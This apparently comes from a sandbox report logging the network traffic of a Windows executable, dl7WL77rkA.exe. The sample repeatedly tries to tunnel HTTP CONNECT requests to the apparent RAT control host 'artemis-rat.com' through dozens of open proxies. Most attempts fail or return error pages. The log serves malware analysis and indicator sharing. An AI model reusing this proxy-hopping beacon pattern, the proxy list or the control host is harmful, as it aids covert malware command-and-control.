                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            843192.168.2.552318192.252.216.8141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.870594978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            844192.168.2.55227943.133.136.20888003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.874052048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            845192.168.2.55225445.251.231.11356783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.878757954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            846192.168.2.55177513.81.217.201803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.878760099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.572294950 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 618
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 63 69 62 65 72 73 65 67 75 72 69 64 61 64 40 61 75 64 65 61 2e 65 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ciberseguridad@audea.es to inform the
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.572314978 CET274INData Raw: 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73
                                                                                                                                                                                                                                                            Data Ascii: m of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Por


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            847192.168.2.55167837.187.77.58525933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.883446932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            848192.168.2.5518095.161.231.34803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.896377087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.115111113 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            849192.168.2.55228960.211.195.150108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.896644115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701905012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            850192.168.2.552333163.172.171.22163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.903270960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.735977888 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            851192.168.2.55231339.108.229.1480023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.918965101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.245106936 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            852192.168.2.552321220.248.70.23790023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.920027018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.249521017 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            853192.168.2.55181524.249.199.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.923384905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            854192.168.2.55234934.92.12.21092383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.933240891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.249002934 CET28INHTTP/1.1 502 Bad Gateway


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            855192.168.2.552362119.28.60.6480903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.934093952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            856192.168.2.552383157.185.157.151265893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.948085070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            857192.168.2.551825129.213.150.20580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.960474968 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            858192.168.2.55233251.161.131.84437123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.043586969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            859192.168.2.550593103.97.179.11510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.048041105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            860192.168.2.552379174.77.111.198495473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.049576044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            861192.168.2.550356199.102.106.9441453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.049643040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            862192.168.2.552387194.4.50.132123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.052906990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            863192.168.2.55007537.52.50.2856783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.053620100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            864192.168.2.55235445.139.11.200803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.054394007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.435652971 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
